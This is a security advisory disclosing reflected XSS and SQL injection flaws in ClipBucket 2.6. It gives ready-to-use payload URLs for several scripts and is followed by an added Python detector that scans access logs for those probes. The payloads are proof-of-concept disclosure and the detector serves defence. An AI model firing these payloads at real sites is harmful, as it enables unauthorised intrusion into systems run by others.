Title: Multiple Vulnerabilities in ClipBucket 2.6
Author: YaDoY666
Website: http://yadoy666.serverisdown.org
Program: Clip Bucket (Open Source Video Sharing)
Affected Versions: 2.6
Cross Site Scripting
================================
[[=] http://www.bkjia.com/[path]/channels.php
[[=] http://www.bkjia.com/[path]/collections.php
[[=] http://www.bkjia.com/[path]/groups.php
[[=] http://www.bkjia.com/[path]/search_result.php
[[=] http://www.bkjia.com/[path]/videos.php
[[=] http://www.bkjia.com/[path]/view_collection.php
[[=] http://www.bkjia.com/[path]/view_item.php
Example:
http://www.bkjia.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://www.bkjia.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://www.bkjia.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://www.bkjia.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
http://www.bkjia.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://www.bkjia.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%3CScRiPt%251%3Ealert%20%27YaDoY666%20Was%20Here%28%27%3C%2fScRiPt%3E
http://www.bkjia.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%3CScRiPt%251%3Ealert%20%27YaDoY666%20Was%20Here%28%27%3C%2fScRiPt%3E
SQL Injection
====================
[[=] http://www.bkjia.com/[path]/channels.php
[[=] http://www.bkjia.com/[path]/videos.php
Example test:
http://www.bkjia.com/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
http://www.bkjia.com/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
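Detection logic for both sections above, added here as an example and not part of the original advisory: it scans web server access-log lines for requests to the scripts the advisory lists, decodes the parameters it names (cat, query, type for the XSS entries; time for the SQL injection entries), and flags values carrying a script tag or, for time, anything outside an expected allow-list. The log lines are constructed, and the allow-list of legitimate time values beyond all_time is an assumption, since the advisory only shows that one value.

```python
"""Flag ClipBucket 2.6 XSS / SQLi probe attempts in access logs.

Added example, not code from the advisory or from ClipBucket. Scripts and
parameter names come from the advisory's example URLs; the log lines are
constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script -> parameters the advisory injects script tags into.
XSS_PARAMS = {
    "channels.php": ("cat",),
    "collections.php": ("cat",),
    "groups.php": ("cat",),
    "search_result.php": ("query",),
    "videos.php": ("cat",),
    "view_collection.php": ("type",),
    "view_item.php": ("type",),
}
# Script -> parameters the advisory shows a quote injected into.
SQLI_PARAMS = {
    "channels.php": ("time",),
    "videos.php": ("time",),
}

# Assumption: the advisory only shows time=all_time as a legitimate value; the
# other entries are placeholders for whatever the deployment actually accepts.
ALLOWED_TIME_VALUES = {"all_time", "today", "this_week", "this_month"}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+) HTTP/[\d.]+"')
SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so double encodings (%253C -> %3C -> <) are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_uri(uri: str) -> list:
    """Return (script, param, kind) findings for one request URI."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs splits on '&' before decoding, so an encoded %26 inside a
    # payload stays inside its parameter value instead of starting a new one.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in XSS_PARAMS.get(script, ()):
        for raw in params.get(name, []):
            value = fully_decode(raw)
            if SCRIPT_TAG_RE.search(value) or "<" in value:
                findings.append((script, name, "xss"))
                break
    for name in SQLI_PARAMS.get(script, ()):
        for raw in params.get(name, []):
            if fully_decode(raw) not in ALLOWED_TIME_VALUES:
                findings.append((script, name, "sqli"))
                break
    return findings


def scan_log(lines) -> list:
    """Run analyze_uri over access-log lines; returns (line_no, script, param, kind)."""
    results = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for script, name, kind in analyze_uri(match.group("uri")):
            results.append((line_no, script, name, kind))
    return results


# Constructed sample log lines (combined log format, not from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2013:12:00:01 +0000] "GET /clipbucket/channels.php'
    '?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27x%27%29%3C%2fScRiPt%3E'
    '&seo_cat_name=&sort=most_recent&time=all_time HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2013:12:00:02 +0000] "GET /clipbucket/videos.php'
    '?cat=all&seo_cat_name=&sort=most_recent&time=1%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [10/Oct/2013:12:00:03 +0000] "GET /clipbucket/videos.php'
    '?cat=all&seo_cat_name=&sort=most_recent&time=all_time HTTP/1.1" 200 8890',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The allow-list check on time is the more useful of the two rules: the advisory's probe is a single quote, but any value the application does not define is worth flagging, so the rule does not depend on recognising a particular injection string. The same allow-list is what the application itself should enforce before the value reaches a query.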